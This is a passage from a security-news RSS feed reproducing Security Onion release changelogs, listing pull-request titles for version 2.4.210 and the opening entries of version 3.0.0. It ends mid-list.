<li>update heavynode's elastic-agent standalone policy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857673307" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15418" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15418/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15418">#15418</a></li>
<li>include all so-grid-nodes_* policies in automatic EA upgrades by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866435572" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15435" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15435/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15435">#15435</a></li>
<li>run fleet ssl state in fleet.config to ensure all required certs are … by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867483894" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15436" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15436/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15436">#15436</a></li>
<li>ensure exclude_files excludes log rotation pattern by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871713912" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15438" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15438/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15438">#15438</a></li>
<li>initialize specific indices as needed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872718733" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15442" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15442/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15442">#15442</a></li>
<li>use logstash merged values for logstash metric collection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3876711533" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15447" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15447/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15447">#15447</a></li>
<li>keep logsdb disabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3877553706" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15448" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15448/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15448">#15448</a></li>
<li>Cogburn/gemini by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872969020" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15443/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15443">#15443</a></li>
<li>allow network installs to use ISO for faster soupin by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3907905473" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15465" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15465/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15465">#15465</a></li>
<li>don't set is_airgap when using nonairgap_useiso: not a true airgap sy… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3908090639" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15468" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15468/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15468">#15468</a></li>
<li>default roles by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3916708276" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15472/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15472">#15472</a></li>
<li>Remove QWEN 235B model from defaults.yaml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3917244683" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15473" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15473/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15473">#15473</a></li>
<li>clarify url_base description by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934024154" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15482" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15482/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15482">#15482</a></li>
<li>Config Tweaks for AI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3933836092" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15481" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15481/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15481">#15481</a></li>
<li>Upgrade Salt 3006.19 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3953089476" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15491" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15491/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15491">#15491</a></li>
<li>fix sensor and heavynode first highstate failure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958145925" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15494" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15494/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15494">#15494</a></li>
<li>Revert "don't set is_airgap when using nonairgap_useiso: not a true airgap sy…" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958481650" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15496" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15496/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15496">#15496</a></li>
<li>Revert "allow network installs to use ISO for faster soupin" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958586726" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15497" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15497/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15497">#15497</a></li>
<li>Assistant: Investigated Query Toggle Filter by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3954137674" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15492/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15492">#15492</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959835149" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15500" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15500/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15500">#15500</a></li>
<li>Add OpenAI Protocols by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959885610" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15501" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15501/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15501">#15501</a></li>
<li>rework autosoup for intermediate upgrades by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3959292299" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15499" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15499/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15499">#15499</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965389886" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15506" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15506/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15506">#15506</a></li>
<li>healthTimeoutSeconds should be an int by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965568559" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15507" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15507/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15507">#15507</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3968564078" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15509" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15509/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15509">#15509</a></li>
<li>New so-yaml.py Functions for Gemini Cypress Test Support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965205639" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15505" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15505/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15505">#15505</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3969600783" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15510/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15510">#15510</a></li>
<li>migrate managed_integrations pillar by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3964403893" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15503" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15503/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15503">#15503</a></li>
<li>upgrade analyzer deps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3969858046" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15511" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15511/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15511">#15511</a></li>
<li>fix consecutive comments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3970386215" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15513/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15513">#15513</a></li>
<li>fix soup failure if salt-relay isn't running by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3979712790" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15519" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15519/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15519">#15519</a></li>
<li>Add Support for upgrading to 3.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3978668913" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15517" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15517/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15517">#15517</a></li>
<li>Rename model ID from 'sonnet-4.5' to 'sonnet' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3984128332" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15522" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15522/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15522">#15522</a></li>
<li>fix field conflicts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3985799413" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15524" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15524/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15524">#15524</a></li>
<li>fix suricata filestream dataset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3985270995" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15523" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15523/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15523">#15523</a></li>
<li>fix agentstatus script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992224234" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15525" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15525/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15525">#15525</a></li>
<li>do not allow auth redirection to login page or home page; that serves… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992282955" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15526" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15526/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15526">#15526</a></li>
<li>exclude transient ghcr.io network errors since it retries during setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3996143254" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15532" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15532/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15532">#15532</a></li>
<li>Cleanup idstools by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3995789938" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15531/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15531">#15531</a></li>
<li>restart salt minion before failing if not ready by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3996717071" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15534" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15534/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15534">#15534</a></li>
<li>prevent caching of main doc to ensure logged out detection is processed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997753009" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15535/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15535">#15535</a></li>
<li>Move rm to post by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001074950" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15536" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15536/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15536">#15536</a></li>
<li>prepare for nextgen docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4002237984" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15539" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15539/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15539">#15539</a></li>
<li>2.4.210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012611157" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15541" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15541/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15541">#15541</a></li>
<li>2.4.210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012969355" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15542" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15542/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15542">#15542</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/Security-Onion-Solutions/securityonion/compare/2.4.201-20260114...2.4.210-20260302"><tt>2.4.201-20260114...2.4.210-20260302</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[3.0.0-20260331]]></title>
<description><![CDATA[Download the ISO
https://github.com/Security-Onion-Solutions/securityonion/blob/434a2e7866b7a6f7379b47b88749f6850baef581/DOWNLOAD_AND_VERIFY_ISO.md
What's Changed

Update VERSION by @TOoSmOotH in #15320
Un-Advanced Assistant ApiUrl by @coreyogburn in #15323
expose login form lifespan in config sc...]]></description>
<link>https://tsecurity.de/de/3487943/it-security-tools/300-20260331/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487943/it-security-tools/300-20260331/</guid>
<pubDate>Tue, 05 May 2026 02:32:33 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Download the ISO</h2>
<p><a href="https://github.com/Security-Onion-Solutions/securityonion/blob/434a2e7866b7a6f7379b47b88749f6850baef581/DOWNLOAD_AND_VERIFY_ISO.md">https://github.com/Security-Onion-Solutions/securityonion/blob/434a2e7866b7a6f7379b47b88749f6850baef581/DOWNLOAD_AND_VERIFY_ISO.md</a></p>
<h2>What's Changed</h2>
<ul>
<li>Update VERSION by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3735481845" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15320" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15320/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15320">#15320</a></li>
<li>Un-Advanced Assistant ApiUrl by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3735981826" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15323" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15323/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15323">#15323</a></li>
<li>expose login form lifespan in config scr by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3760895287" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15347" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15347/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15347">#15347</a></li>
